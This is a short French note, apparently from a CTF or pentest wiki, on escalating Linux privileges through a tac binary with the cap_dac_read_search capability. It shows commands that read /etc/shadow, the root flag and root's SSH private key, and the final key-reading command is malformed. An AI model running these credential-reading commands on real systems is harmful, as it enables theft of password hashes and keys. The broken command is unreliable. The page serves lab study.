Capabilities (Tac) - Linux Privilege Escalation

Nous listons les fichiers avec des capacités spécifiques :

getcap -r / 2>/dev/null

Nous identifions que tac dispose de la capacité cap_dac_read_search+ei :

La commande tac (inverse de cat) nous permet de lire les fichiers en inversant leur contenu.

tac /etc/shadow

Lecture du flag root.txt

tac /root/root.txt | tac

Récupération de la clé SSH root

/usr/bin/tac | /root/.ssh/id_rsa | /usr/bin/tac

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?